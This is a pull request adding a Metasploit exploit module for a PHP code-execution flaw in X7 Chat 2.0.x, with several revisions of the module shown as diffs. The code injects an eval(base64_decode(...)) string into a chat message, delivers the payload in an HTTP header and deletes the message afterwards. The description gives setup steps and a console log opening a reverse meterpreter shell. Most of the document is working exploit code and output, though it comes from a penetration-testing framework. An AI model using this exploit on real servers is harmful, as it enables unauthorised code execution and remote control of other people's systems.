### PR TITLE
Add PHP Code Execution for X7 Chat 2.0.5

### DIFF
--- a/modules/exploits/multi/http/x7chat2_php_exec.rb
+++ b/modules/exploits/multi/http/x7chat2_php_exec.rb
@@ -15,8 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
       'Description'    => %q{
-        Library lib/message.php for X7 Chat versions 2.0.5 and 2.0.5.1 uses preg_replace() function with the /e modifier.
-        This allows execute PHP code in the remote machine.
+        This module exploits a post-auth vulnerability found in X7 Chat versions 2.0.0 up to 2.0.5.1.
+        Library lib/message.php uses preg_replace() function with the /e modifier.
+        This allows a remote authenticated attacker to execute PHP code in the remote machine.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -50,20 +51,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exec_php(php_code, check = false)
 
+    # remove comments, line breaks and spaces of php_code
+    pclean = php_code.gsub(/(\s+)|(#.*)/, '')
+
+    # clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)
+    while Rex::Text.encode_base64(pclean) =~ /=/
+      pclean = "#{ pclean } "
+    end
+    pb64 = Rex::Text.encode_base64(pclean)
+
     cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
     cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['PASSWORD']) }"
-    rand_text = Rex::Text.rand_text_alpha(5, 8)
+    rand_text = Rex::Text.rand_text_alpha_upper(5, 8)
 
-    # remove comments, line breaks and spaces
-    praw = php_code.gsub(/(\s+)|(#.*)/, '')
-
-    # clean b64 (we can not use quotes or apostrophes and b64 string must not contain equals)
-    while Rex::Text.encode_base64(praw) =~ /==/ || Rex::Text.encode_base64(praw) =~ /=/
-      praw = "#{ praw } "
-    end
-
-    pb64 = Rex::Text.encode_base64(praw)
-
+    print_status("Trying for version 2.0.2 up to 2.0.5.1")
     print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
     res = send_request_cgi({
       'method'   => 'GET',
@@ -72,26 +73,56 @@ class Metasploit3 < Msf::Exploit::Remote
         'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
       },
       'vars_get' => {
-        'act'     => 'userpanel',
+        # value compatible with 2.0.2 up to 2.0.5.1
+        'act'     => 'user_cp',
         'cp_page' => 'msgcenter',
         'to'      => datastore['USERNAME'],
         'subject' => rand_text,
-        'body'    => "#{ rand_text }www.${eval(base64_decode(getallheaders()[#{ rand_text }]))}.c#{ rand_text }",
+        'body'    => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }",
       }
     })
 
-    if res && res.code == 200
-      print_good("Message (#{ rand_text }) sent successfully")
-    else
+    if !res || res.code != 200
       print_error("Sending the message (#{ rand_text }) has failed")
       return
     end
 
-    if res && res.body =~ /([0-9]*)">#{ rand_text }/
+    if res.body =~ /([0-9]*)">#{ rand_text }/
       message_id = Regexp.last_match[1]
+      userpanel = 'user_cp'
     else
       print_error("Could not find message (#{ rand_text }) in the message list")
-      return
+
+      print_status("Retrying for version 2.0.0 up to 2.0.1 a1")
+      print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, 'index.php'),
+        'headers'  => {
+          'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
+        },
+        'vars_get' => {
+          # value compatible with 2.0.0 up to 2.0.1 a1
+          'act'     => 'usercp',
+          'cp_page' => 'msgcenter',
+          'to'      => datastore['USERNAME'],
+          'subject' => rand_text,
+          'body'    => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }",
+        }
+      })
+
+      if !res || res.code != 200
+        print_error("Sending the message (#{ rand_text }) has failed")
+        return
+      end
+
+      if res.body =~ /([0-9]*)">#{ rand_text }/
+        message_id = Regexp.last_match[1]
+        userpanel = 'usercp'
+      else
+        print_error("Could not find message (#{ rand_text }) in the message list")
+        return
+      end
     end
 
     print_status("Accessing message (#{ rand_text })")
@@ -104,9 +135,9 @@ class Metasploit3 < Msf::Exploit::Remote
         rand_text => pb64,
       },
       'vars_get'  => {
-        'act'     => 'userpanel',
+        'act'     => userpanel,
         'cp_page' => 'msgcenter',
-        'read'    =>  message_id,
+        'read'    => message_id,
       }
     })
 
@@ -120,9 +151,9 @@ class Metasploit3 < Msf::Exploit::Remote
         'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
       },
       'vars_get' => {
-        'act'     => 'userpanel',
+        'act'     => userpanel,
         'cp_page' => 'msgcenter',
-        'delete'  =>  message_id,
+        'delete'  => message_id,
       }
     })
 

--- a/modules/exploits/multi/http/x7chat2_php_exec.rb
+++ b/modules/exploits/multi/http/x7chat2_php_exec.rb
@@ -6,140 +6,141 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = GoodRanking
+  Rank = GoodRanking
 
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::PhpEXE
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
 
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
-			'Description'    => %q{
-				Library lib/message.php for X7 Chat 2.0.5 uses preg_replace() function with the /e modifier.
-        		This allows execute PHP code in the remote machine.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         =>
-				[
-					'Fernando Munoz # fmunozs', # discovery
-					'Juan Escobar # itseco', # module development
-				],
-			#'References' 	 => [],
-			'Platform'       => ['php'],
-      		'Arch'           => ARCH_PHP,
-			'Targets'        => [
-				['Generic (PHP Payload)', {'Arch' => ARCH_PHP, 'Platform' => 'php'}]
-			],
-			'DisclosureDate' => 'Oct 27 2014',
-			'DefaultTarget'  => 0))
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
+      'Description'    => %q{
+        Library lib/message.php for X7 Chat 2.0.5 uses preg_replace() function with the /e modifier.
+            This allows execute PHP code in the remote machine.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Fernando Munoz <fernando[at]null-life.com>', # discovery & module development
+          'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
+        ],
+      'Platform'       => ['php'],
+          'Arch'           => ARCH_PHP,
+      'Targets'        => [
+        ['Generic (PHP Payload)', {}]
+      ],
+      'DisclosureDate' => 'Oct 27 2014',
+      'DefaultTarget'  => 0))
 
-			register_options(
-			[
-				OptString.new('USERNAME', [ true, 'Username to authenticate as', 'user']),
-				OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'user']),
-				OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']),
-			], self.class)
-	end
+      register_options(
+      [
+        OptString.new('USERNAME', [ true, 'Username to authenticate as', '']),
+        OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', '']),
+        OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']),
+      ], self.class)
+  end
 
-	def check
-	    res = exec_php("phpinfo(); die();", true)
+  def check
+      res = exec_php("phpinfo(); die();", true)
 
-	    if (res.body =~ /This program makes use of the Zend/)
-	    	return Exploit::CheckCode::Vulnerable
-	    else
-	      return Exploit::CheckCode::Unknown
-	    end
-	end
+      if res && res.body =~ /This program makes use of the Zend/
+        return Exploit::CheckCode::Vulnerable
+      else
+        return Exploit::CheckCode::Unknown
+      end
+  end
 
-	def exec_php(php_code, check = false)
+  def exec_php(php_code, check = false)
 
-		cookie_x7c2u = "X7C2U=" + datastore['USERNAME']
-		cookie_x7c2p = "X7C2P=" + Rex::Text.md5(datastore['USERNAME']) 
-		rand_text = Rex::Text.rand_text_alpha(5, 8)
+    cookie_x7c2u = "X7C2U=" + datastore['USERNAME']
+    cookie_x7c2p = "X7C2P=" + Rex::Text.md5(datastore['USERNAME'])
+    rand_text = Rex::Text.rand_text_alpha(5, 8)
 
-		# remove comments, line breaks and spaces
-		praw = php_code.gsub(/(\s+)|(#.*)/, '')
-		
-		# clean b64 (we can not use quotes or apostrophes and b64 string must not contain equals)
-		while Rex::Text.encode_base64(praw) =~ /==/ || Rex::Text.encode_base64(praw) =~ /=/
-			praw = praw + " "
-		end
+    # remove comments, line breaks and spaces
+    praw = php_code.gsub(/(\s+)|(#.*)/, '')
 
-		pb64 = Rex::Text.encode_base64(praw)
+    # clean b64 (we can not use quotes or apostrophes and b64 string must not contain equals)
+    while Rex::Text.encode_base64(praw) =~ /==/ || Rex::Text.encode_base64(praw) =~ /=/
+      praw = praw + " "
+    end
 
-		print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...")
-		res = send_request_cgi({
-			'method'   => 'GET',
-			'uri' 	   => normalize_uri(target_uri.path, 'index.php'),
-			'headers'  => {
-				'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
-			},
-			'vars_get' => {
-				'act' 	  => 'userpanel',	
-				'cp_page' => 'msgcenter',	
-				'to' 	  => datastore['USERNAME'],	
-				'subject' => rand_text,
-				'body' 	  => "#{rand_text}www.${eval(base64_decode(getallheaders()[p]))}.c#{rand_text}",
-			}
-		})
+    pb64 = Rex::Text.encode_base64(praw)
 
-		if res && res.code == 200
-			print_good("Message (#{rand_text}) sent successfully")
-		else
-			fail_with(Failure::NoAccess, 'Sending the message (#{rand_text}) has failed')
-		end
+    print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'index.php'),
+      'headers'  => {
+        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+      },
+      'vars_get' => {
+        'act'     => 'userpanel',
+        'cp_page' => 'msgcenter',
+        'to'     => datastore['USERNAME'],
+        'subject' => rand_text,
+        'body'     => "#{rand_text}www.${eval(base64_decode(getallheaders()[p]))}.c#{rand_text}",
+      }
+    })
 
-		if res.body =~ /([0-9]*)">#{rand_text}/
-			message_id = $1
-		else
-			fail_with(Failure::NoAccess, 'Could not find message (#{rand_text}) in the message list')
-		end
+    if res && res.code == 200
+      print_good("Message (#{rand_text}) sent successfully")
+    else
+      print_error("Sending the message (#{rand_text}) has failed")
+      return Exploit::CheckCode::Unknown
+    end
 
-		print_status("Accessing message (#{rand_text})")
-		print_status("Sending payload in HTTP header 'p'")
-		res = send_request_cgi({
-			'method'   => 'GET',
-			'uri' 	   => normalize_uri(target_uri.path, 'index.php'),
-			'headers'  => {
-				'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
-				'p'     => "#{pb64}",
-			},
-			'vars_get' => {
-				'act' 	  => 'userpanel',	
-				'cp_page' => 'msgcenter',	
-				'read'	  =>  message_id,
-			}	
-		})
+    if res && res.body =~ /([0-9]*)">#{rand_text}/
+      message_id = $1
+    else
+      print_error("Could not find message (#{rand_text}) in the message list")
+      return Exploit::CheckCode::Unknown
+    end
 
-		res_payload = res
+    print_status("Accessing message (#{rand_text})")
+    print_status("Sending payload in HTTP header 'p'")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'index.php'),
+      'headers'  => {
+        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+        'p'     => "#{pb64}",
+      },
+      'vars_get' => {
+        'act'     => 'userpanel',
+        'cp_page' => 'msgcenter',
+        'read'    =>  message_id,
+      }
+    })
 
-		print_status("Deleting message (#{rand_text})")
-		res = send_request_cgi({
-			'method'   => 'GET',
-			'uri' 	   => normalize_uri(target_uri.path, 'index.php'),
-			'headers'  => {
-				'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
-			},
-			'vars_get' => {
-				'act' 	  => 'userpanel',	
-				'cp_page' => 'msgcenter',	
-				'delete'  =>  message_id,
-			}	
-		})		
+    res_payload = res
 
-		if res.body =~ /The message has been deleted/
-			print_good("Message (#{rand_text}) removed")
-		else
-			print_error('Removing message (#{rand_text}) has failed')
-		end
+    print_status("Deleting message (#{rand_text})")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'index.php'),
+      'headers'  => {
+        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+      },
+      'vars_get' => {
+        'act'     => 'userpanel',
+        'cp_page' => 'msgcenter',
+        'delete'  =>  message_id,
+      }
+    })
 
-		# if check return the response
-		if check
-			return res_payload
-		end
-	end
+    if res && res.body =~ /The message has been deleted/
+      print_good("Message (#{rand_text}) removed")
+    else
+      print_error("Removing message (#{rand_text}) has failed")
+    end
 
-	def exploit
-		exec_php(payload.raw)
-	end
+    # if check return the response
+    if check
+      return res_payload
+    end
+  end
+
+  def exploit
+    exec_php(payload.encoded)
+  end
 end

--- a/modules/exploits/multi/http/x7chat2_php_exec.rb
+++ b/modules/exploits/multi/http/x7chat2_php_exec.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
 			'Description'    => %q{
 				Library lib/message.php for X7 Chat 2.0.5 uses preg_replace() function with the /e modifier.
-        		This allow execute PHP code in the remote machine.
+        		This allows execute PHP code in the remote machine.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>

--- a/modules/exploits/multi/http/x7chat2_php_exec.rb
+++ b/modules/exploits/multi/http/x7chat2_php_exec.rb
@@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
       'Description'    => %q{
-        Library lib/message.php for X7 Chat 2.0.5 uses preg_replace() function with the /e modifier.
-            This allows execute PHP code in the remote machine.
+        Library lib/message.php for X7 Chat version 2.0.5 and 2.0.5.1 uses preg_replace() function with the /e modifier.
+        This allows execute PHP code in the remote machine.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -25,10 +25,8 @@ class Metasploit3 < Msf::Exploit::Remote
           'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
         ],
       'Platform'       => ['php'],
-          'Arch'           => ARCH_PHP,
-      'Targets'        => [
-        ['Generic (PHP Payload)', {}]
-      ],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Generic (PHP Payload)', {}]],
       'DisclosureDate' => 'Oct 27 2014',
       'DefaultTarget'  => 0))
 
@@ -41,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-      res = exec_php("phpinfo(); die();", true)
+      res = exec_php('phpinfo(); die();', true)
 
       if res && res.body =~ /This program makes use of the Zend/
         return Exploit::CheckCode::Vulnerable
@@ -52,8 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exec_php(php_code, check = false)
 
-    cookie_x7c2u = "X7C2U=" + datastore['USERNAME']
-    cookie_x7c2p = "X7C2P=" + Rex::Text.md5(datastore['USERNAME'])
+    cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
+    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['USERNAME']) }"
     rand_text = Rex::Text.rand_text_alpha(5, 8)
 
     # remove comments, line breaks and spaces
@@ -61,51 +59,51 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # clean b64 (we can not use quotes or apostrophes and b64 string must not contain equals)
     while Rex::Text.encode_base64(praw) =~ /==/ || Rex::Text.encode_base64(praw) =~ /=/
-      praw = praw + " "
+      praw = "#{ praw } "
     end
 
     pb64 = Rex::Text.encode_base64(praw)
 
-    print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...")
+    print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, 'index.php'),
       'headers'  => {
-        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+        'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
       },
       'vars_get' => {
         'act'     => 'userpanel',
         'cp_page' => 'msgcenter',
-        'to'     => datastore['USERNAME'],
+        'to'      => datastore['USERNAME'],
         'subject' => rand_text,
-        'body'     => "#{rand_text}www.${eval(base64_decode(getallheaders()[p]))}.c#{rand_text}",
+        'body'    => "#{ rand_text }www.${eval(base64_decode(getallheaders()[#{ rand_text }]))}.c#{ rand_text }",
       }
     })
 
     if res && res.code == 200
-      print_good("Message (#{rand_text}) sent successfully")
+      print_good("Message (#{ rand_text }) sent successfully")
     else
-      print_error("Sending the message (#{rand_text}) has failed")
-      return Exploit::CheckCode::Unknown
+      print_error("Sending the message (#{ rand_text }) has failed")
+      return
     end
 
-    if res && res.body =~ /([0-9]*)">#{rand_text}/
-      message_id = $1
+    if res && res.body =~ /([0-9]*)">#{ rand_text }/
+      message_id = Regexp.last_match[1]
     else
-      print_error("Could not find message (#{rand_text}) in the message list")
-      return Exploit::CheckCode::Unknown
+      print_error("Could not find message (#{ rand_text }) in the message list")
+      return
     end
 
-    print_status("Accessing message (#{rand_text})")
-    print_status("Sending payload in HTTP header 'p'")
+    print_status("Accessing message (#{ rand_text })")
+    print_status("Sending payload in HTTP header '#{ rand_text }'")
     res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, 'index.php'),
-      'headers'  => {
-        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
-        'p'     => "#{pb64}",
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, 'index.php'),
+      'headers'   => {
+        'Cookie'  => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
+        rand_text => pb64,
       },
-      'vars_get' => {
+      'vars_get'  => {
         'act'     => 'userpanel',
         'cp_page' => 'msgcenter',
         'read'    =>  message_id,
@@ -114,12 +112,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res_payload = res
 
-    print_status("Deleting message (#{rand_text})")
+    print_status("Deleting message (#{ rand_text })")
     res = send_request_cgi({
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path, 'index.php'),
       'headers'  => {
-        'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+        'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
       },
       'vars_get' => {
         'act'     => 'userpanel',
@@ -129,9 +127,9 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res && res.body =~ /The message has been deleted/
-      print_good("Message (#{rand_text}) removed")
+      print_good("Message (#{ rand_text }) removed")
     else
-      print_error("Removing message (#{rand_text}) has failed")
+      print_error("Removing message (#{ rand_text }) has failed")
     end
 
     # if check return the response

--- a/modules/exploits/multi/http/x7chat2_php_exec.rb
+++ b/modules/exploits/multi/http/x7chat2_php_exec.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
       'Description'    => %q{
-        Library lib/message.php for X7 Chat version 2.0.5 and 2.0.5.1 uses preg_replace() function with the /e modifier.
+        Library lib/message.php for X7 Chat versions 2.0.5 and 2.0.5.1 uses preg_replace() function with the /e modifier.
         This allows execute PHP code in the remote machine.
       },
       'License'        => MSF_LICENSE,
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def exec_php(php_code, check = false)
 
     cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
-    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['USERNAME']) }"
+    cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['PASSWORD']) }"
     rand_text = Rex::Text.rand_text_alpha(5, 8)
 
     # remove comments, line breaks and spaces

--- a/modules/exploits/multi/http/x7chat2_php_exec.rb
+++ b/modules/exploits/multi/http/x7chat2_php_exec.rb
@@ -1,0 +1,145 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::PhpEXE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
+			'Description'    => %q{
+				Library lib/message.php for X7 Chat 2.0.5 uses preg_replace() function with the /e modifier.
+        		This allow execute PHP code in the remote machine.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Fernando Munoz # fmunozs', # discovery
+					'Juan Escobar # itseco', # module development
+				],
+			#'References' 	 => [],
+			'Platform'       => ['php'],
+      		'Arch'           => ARCH_PHP,
+			'Targets'        => [
+				['Generic (PHP Payload)', {'Arch' => ARCH_PHP, 'Platform' => 'php'}]
+			],
+			'DisclosureDate' => 'Oct 27 2014',
+			'DefaultTarget'  => 0))
+
+			register_options(
+			[
+				OptString.new('USERNAME', [ true, 'Username to authenticate as', 'user']),
+				OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'user']),
+				OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']),
+			], self.class)
+	end
+
+	def check
+	    res = exec_php("phpinfo(); die();", true)
+
+	    if (res.body =~ /This program makes use of the Zend/)
+	    	return Exploit::CheckCode::Vulnerable
+	    else
+	      return Exploit::CheckCode::Unknown
+	    end
+	end
+
+	def exec_php(php_code, check = false)
+
+		cookie_x7c2u = "X7C2U=" + datastore['USERNAME']
+		cookie_x7c2p = "X7C2P=" + Rex::Text.md5(datastore['USERNAME']) 
+		rand_text = Rex::Text.rand_text_alpha(5, 8)
+
+		# remove comments, line breaks and spaces
+		praw = php_code.gsub(/(\s+)|(#.*)/, '')
+		
+		# clean b64 (we can not use quotes or apostrophes and b64 string must not contain equals)
+		while Rex::Text.encode_base64(praw) =~ /==/ || Rex::Text.encode_base64(praw) =~ /=/
+			praw = praw + " "
+		end
+
+		pb64 = Rex::Text.encode_base64(praw)
+
+		print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...")
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri' 	   => normalize_uri(target_uri.path, 'index.php'),
+			'headers'  => {
+				'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+			},
+			'vars_get' => {
+				'act' 	  => 'userpanel',	
+				'cp_page' => 'msgcenter',	
+				'to' 	  => datastore['USERNAME'],	
+				'subject' => rand_text,
+				'body' 	  => "#{rand_text}www.${eval(base64_decode(getallheaders()[p]))}.c#{rand_text}",
+			}
+		})
+
+		if res && res.code == 200
+			print_good("Message (#{rand_text}) sent successfully")
+		else
+			fail_with(Failure::NoAccess, 'Sending the message (#{rand_text}) has failed')
+		end
+
+		if res.body =~ /([0-9]*)">#{rand_text}/
+			message_id = $1
+		else
+			fail_with(Failure::NoAccess, 'Could not find message (#{rand_text}) in the message list')
+		end
+
+		print_status("Accessing message (#{rand_text})")
+		print_status("Sending payload in HTTP header 'p'")
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri' 	   => normalize_uri(target_uri.path, 'index.php'),
+			'headers'  => {
+				'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+				'p'     => "#{pb64}",
+			},
+			'vars_get' => {
+				'act' 	  => 'userpanel',	
+				'cp_page' => 'msgcenter',	
+				'read'	  =>  message_id,
+			}	
+		})
+
+		res_payload = res
+
+		print_status("Deleting message (#{rand_text})")
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri' 	   => normalize_uri(target_uri.path, 'index.php'),
+			'headers'  => {
+				'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+			},
+			'vars_get' => {
+				'act' 	  => 'userpanel',	
+				'cp_page' => 'msgcenter',	
+				'delete'  =>  message_id,
+			}	
+		})		
+
+		if res.body =~ /The message has been deleted/
+			print_good("Message (#{rand_text}) removed")
+		else
+			print_error('Removing message (#{rand_text}) has failed')
+		end
+
+		# if check return the response
+		if check
+			return res_payload
+		end
+	end
+
+	def exploit
+		exec_php(payload.raw)
+	end
+end


### PR DESCRIPTION
Hello,

This is a module to exploit a PHP Code Execution in the product X7 Chat version 2.0.5. Library lib/message.php file uses preg_replace() function with the /e modifier, this allow execute PHP code in the remote machine. The vulnerability was found by Fernando Muñoz @fmunozs.

```
118 $message = preg_replace("/(http:\/\/(.+?)\.[^ \[\"<]*)(.)/ie","autoparse_url(\"2\",\"$1\",\"$3\");",$message);
119 $message = preg_replace("/(www\.(.+?)\.[^ \[\"<]*)(.)/ie","autoparse_url(\"1\",\"$1\",\"$3\");",$message);
```

In order to test the module you must:
1.  Download X7 Chat version 2.0.5: http://www.x7chat.com/releases/v2/x7chat2_0_5.zip.
2. Deploy it in your local enviroment. If you have problems setting the database in the webapp, you must go to install.php file and remove TYPE=MyISAM in the installation query (lines 477 - 487).
3. Register a new user in the Register link or just use the administrator user.
4. Use the module in this way:

```
msf > use exploits/multi/http/x7chat2_php_exec
msf exploit(x7chat2_php_exec) > set RHOST 192.168.1.113
RHOST => 192.168.1.113
msf exploit(x7chat2_php_exec) > set USERNAME
USERNAME => user
msf exploit(x7chat2_php_exec) > set PASSWORD
PASSWORD => user
msf exploit(x7chat2_php_exec) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(x7chat2_php_exec) > set LHOST 192.168.1.103
LHOST => 192.168.1.103
msf exploit(x7chat2_php_exec) > check 

[*] Sending offline message (tRaZR) to user...
[+] Message (tRaZR) sent successfully
[*] Accessing message (tRaZR)
[*] Sending payload in HTTP header 'p'
[*] Deleting message (tRaZR)
[+] Message (tRaZR) removed
[+] 192.168.1.113:80 - The target is vulnerable.
msf exploit(x7chat2_php_exec) > exploit 

[*] Started reverse handler on 192.168.1.103:4444 
[*] Sending offline message (ijSON) to user...
[+] Message (ijSON) sent successfully
[*] Accessing message (ijSON)
[*] Sending payload in HTTP header 'p'
[*] Sending stage (40551 bytes) to 192.168.1.113
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.113:6311) at 2014-10-27 01:29:51 -0500

[*] Deleting message (ijSON)
[+] Message (ijSON) removed

meterpreter > 
```

![x7chat2 msf](https://cloud.githubusercontent.com/assets/1725054/4786962/db4c1514-5da2-11e4-8c8a-f17b97ca1bc5.png)

Thank you.
